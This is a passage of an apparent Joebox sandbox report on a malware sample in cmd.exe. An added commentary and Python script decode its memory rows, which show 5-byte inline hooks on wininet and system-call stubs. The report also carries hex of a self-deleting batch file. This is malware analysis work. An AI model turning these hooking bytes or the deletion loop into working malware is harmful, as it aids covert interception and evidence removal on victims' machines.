2152 C:\WINDOWS\system32\cmd.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 16F04F
2152 C:\WINDOWS\system32\cmd.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 16F134
2152 C:\WINDOWS\system32\cmd.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 16F04F
2152 C:\WINDOWS\system32\cmd.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 16F134
2152 C:\WINDOWS\system32\cmd.exe 77212EBC 1000 page execute and read and write page execute read success or wait 1 16F04F
2152 C:\WINDOWS\system32\cmd.exe 77212EBC 1000 page execute read page execute and read and write success or wait 1 16F134
2152 C:\WINDOWS\system32\cmd.exe 771C60A1 1000 page execute and read and write page execute read success or wait 1 16F04F
2152 C:\WINDOWS\system32\cmd.exe 771C60A1 1000 page execute read page execute and read and write success or wait 1 16F134
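Read together, the "Memory allocated", "Memory attributes changed", "Memory read" and "Memory written" rows above are the textbook sequence for installing 5-byte inline hooks: one PAGE_EXECUTE_READWRITE allocation at A90000, then for each of four target addresses a page flip to RWX, a read of the first 30 bytes, a 10-byte write into the A90000 block (the original 5-byte prologue followed by a JMP), a 5-byte JMP written over the prologue itself, and a flip back to RX. Two of the targets (77212EBC and 771C60A1) fall inside the wininet.dll mapping listed above (771B0000, size 696320); the other two (7C90D1AE, 7C91632D) lie above kernel32's mapping at 7C800000, and the `B8 imm32 / BA 00 03 FE 7F / FF 12 / C2 xx 00` bytes read at 7C90D1AE have the shape of an XP Nt* system-call stub (which service number 0x35 names on this build is not recorded in the report). The script below is an added example, not part of the Joebox report: it embeds those rows verbatim as constructed input, decodes each E9 rel32 jump, pairs every hooked address with the trampoline that resumes at hooked+5, checks that the trampoline holds the bytes the malware read from the target and lives inside the RWX allocation, and reports where the detours land. The helper names (`find_hooks`, `jmp_target`, `InlineHook`, `detour_range`) are this example's own.

```python
"""Decode the inline hooks installed in cmd.exe (PID 2152) from the report's memory rows (added example)."""
import struct
from dataclasses import dataclass

# Values copied from the report's "Memory read", "Memory written" and "Memory allocated"
# rows for PID 2152. Addresses are the 32-bit user-mode addresses the log shows.
ORIGINAL_BYTES = {  # "Memory read": 30 bytes at each target, captured before patching
    0x7C90D1AE: "B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10",
    0x7C91632D: "68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD",
    0x77212EBC: "8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75",
    0x771C60A1: "8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D",
}
WRITES = {  # "Memory written": address -> bytes written
    0xA90000:   "B8 35 00 00 00 E9 A9 D1 E7 7B",
    0x7C90D1AE: "E9 A4 AE 85 83",
    0xA9000A:   "68 6C 02 00 00 E9 1E 63 E8 7B",
    0x7C91632D: "E9 09 1F 85 83",
    0xA90014:   "8B FF 55 8B EC E9 A3 2E 78 76",
    0x77212EBC: "E9 FD 4B F4 88",
    0xA9001E:   "8B FF 55 8B EC E9 7E 60 73 76",
    0x771C60A1: "E9 6F 1A F9 88",
}
# "Memory allocated": the page execute and read and write block at A90000, length 2DF4C0
RWX_REGION = (0xA90000, 0xA90000 + 0x2DF4C0)


def jmp_target(addr, code):
    """Absolute target of an E9 rel32 near jump whose first byte sits at `addr`."""
    if len(code) < 5 or code[0] != 0xE9:
        raise ValueError(f"no E9 rel32 jump at {addr:08X}")
    rel = struct.unpack_from("<i", code, 1)[0]   # signed 32-bit displacement
    return (addr + 5 + rel) & 0xFFFFFFFF          # relative to the next instruction


@dataclass
class InlineHook:
    hooked: int       # patched function address
    detour: int       # where the 5-byte JMP sends execution
    trampoline: int   # where the displaced prologue lives
    saved: bytes      # the displaced prologue bytes


def find_hooks(writes=WRITES, original=ORIGINAL_BYTES, rwx=RWX_REGION):
    """Pair each 5-byte JMP write with the trampoline that resumes right behind it."""
    detours, tramps = {}, {}
    for addr, hexdump in writes.items():
        code = bytes.fromhex(hexdump)
        if len(code) == 5 and code[0] == 0xE9:
            detours[addr] = jmp_target(addr, code)          # the hook itself
        elif len(code) > 5 and code[-5] == 0xE9:
            saved = code[:-5]                                # displaced original bytes
            resume = jmp_target(addr + len(saved), code[-5:])
            tramps[resume] = (addr, saved)                   # keyed by where it jumps back to
    hooks = []
    for hooked, detour in sorted(detours.items()):
        if hooked + 5 not in tramps:
            continue                                         # a lone JMP is not this pattern
        tramp_addr, saved = tramps[hooked + 5]
        if saved != bytes.fromhex(original[hooked])[:len(saved)]:
            raise ValueError(f"trampoline at {tramp_addr:08X} does not hold the original prologue")
        if not rwx[0] <= tramp_addr < rwx[1]:
            raise ValueError(f"trampoline at {tramp_addr:08X} is outside the RWX allocation")
        hooks.append(InlineHook(hooked, detour, tramp_addr, saved))
    return hooks


def detour_range(hooks):
    """(lowest, highest) detour address: where the hook handlers live."""
    targets = [h.detour for h in hooks]
    return min(targets), max(targets)


if __name__ == "__main__":
    found = find_hooks()
    for h in found:
        print(f"{h.hooked:08X} -> detour {h.detour:08X}, trampoline {h.trampoline:08X} "
              f"(saved {h.saved.hex(' ').upper()})")
    lo, hi = detour_range(found)
    print(f"all detours land in {lo:08X}..{hi:08X}")
```

Two details worth checking in any such log. First, every displaced prologue is exactly 5 bytes of whole instructions (`mov eax, imm32`; `push imm32`; `mov edi, edi / push ebp / mov ebp, esp`), so the overwrite splits no instruction and the trampoline can legally resume at hooked+5. Second, all four detours resolve to 0x157ABE..0x16823B, the same low range as the "Source Address" column of the writes themselves (16F0EC, 16F11A), which places the hook handlers in the injected code rather than in any mapped module listed above.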
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2817992848
Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2818043301
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 2F0000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2818126990
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 310000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2818164592
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 360000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2818203326
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 3B0000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2818216502
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 3B0000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2818242490
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 3B0000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2818247392
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2818618645
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2818698576
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2818709297
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid object name not found 2818794751
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2818796531
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 3C0000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2819430400
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 500000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2819672837
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 500000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2819690276
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid success or wait 2819697463
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2819738350
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2819780731
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2819837738
Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 2819915709
Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2819976192
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2820119551
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2820212416
Section loaded Path: \KnownDlls\MSACM32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid object name not found 2820296593
Section loaded Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 2820298136
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2820569507
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2820660726
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2820941102
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2820975089
Section loaded Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2821012250
Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 2821013765
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 510000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2821151361
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 490000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2821774871
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 490000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2821823354
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2821825489
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 9F0000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2822396648
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 9F0000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2822513199
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2822523250
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 4C0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2822660180
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 4C0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2822670244
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 4C0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2822681183
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2822788238
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 9F0000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2822844006
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 9F0000 Size: 618496 Protection: readonly Mapped to pid: own pid object name not found 2823491128
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2823492643
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2823790784
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2823993912
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2824270316
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2824355296
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 771B0000 Size: 696320 Protection: read write Mapped to pid: own pid success or wait 2825094081
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: read Type: commit Baseaddress: 9F0000 Size: 667648 Protection: readonly Mapped to pid: own pid success or wait 2825403365
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 2826602957
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DisableUNCCheck object name not found 2826700604
Memory allocated PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 9F0000 Length: 2DF8C8 Allocation Type: null Protection: page read and write success or wait 2826701048
Memory allocated PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 9F0000 Length: 2DF8CC Allocation Type: null Protection: page read and write success or wait 2826701324
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: EnableExtensions success or wait 2826713903
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DelayedExpansion object name not found 2826725165
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DefaultColor success or wait 2826788976
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: CompletionChar success or wait 2826807813
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: PathCompletionChar success or wait 2826858310
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: AutoRun success or wait 2826860263
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DisableUNCCheck object name not found 2826871270
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: EnableExtensions success or wait 2826893073
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DelayedExpansion object name not found 2826895646
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DefaultColor success or wait 2826916538
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: CompletionChar success or wait 2826962969
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: PathCompletionChar object name not found 2826964163
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: AutoRun object name not found 2826965358
Memory allocated PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: A70000 Length: 13FE10 Allocation Type: null Protection: page read and write success or wait 2827095443
Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Access: query and read Type: commit Baseaddress: A80000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2827929237
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828053270
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828056340
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Offset: none Length: 8192 Value: 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 success or wait 2828060740
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828102646
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828110461
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828123219
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828150903
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828162771
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Offset: none Length: 8192 Value: 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D success or wait 2828166859
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828268890
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828273269
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828278434
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828357998
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828359378
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Offset: none Length: 8192 Value: 64 65 6C 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 success or wait 2828362722
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828384865
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828387937
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828391536
File opened Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2828448996
File deleted Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe success or wait 2828458033
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: Enabled object name not found 2828462125
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: EnabledV8 success or wait 2828478985
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: CleanCookies success or wait 2828498258
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: CleanCookies success or wait 2828500660
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1406 success or wait 2828503651
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1609 success or wait 2828513050
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1406 success or wait 2828520621
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1609 success or wait 2828548670
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1406 success or wait 2828568301
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1609 success or wait 2828571904
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1406 success or wait 2828633793
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1609 success or wait 2828636818
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1406 success or wait 2828649567
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Name: 1609 success or wait 2828652996
Memory allocated PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: A90000 Length: 2DF4C0 Allocation Type: null Protection: page execute and read and write success or wait 2828687053
Memory attributes changed PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2828688108
Memory read PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 2828688408
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: A90000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 E7 7B success or wait 2828716590
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828727705
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828729570
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Offset: none Length: 8192 Value: 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 20 67 6F 74 6F 20 64 0D 0A 64 65 6C 20 2F 46 20 22 43 3A success or wait 2828731223
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828750028
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D1AE Length: 5 Value: E9 A4 AE 85 83 success or wait 2828750266
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828753283
Memory attributes changed PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2828754489
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828775671
Memory attributes changed PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2828780208
Memory read PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 2828787665
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828805751
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828821658
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: A9000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 E8 7B success or wait 2828822659
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat Offset: none Length: 8192 Value: 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 74 6D 70 61 63 38 64 31 32 37 34 2E 62 61 74 22 0D 0A 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 20 67 6F 74 6F 20 64 0D 0A 00 65 6C 20 2F 46 20 22 43 3A success or wait 2828850211
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828867035
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 7C91632D Length: 5 Value: E9 09 1F 85 83 success or wait 2828870193
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 2828870728
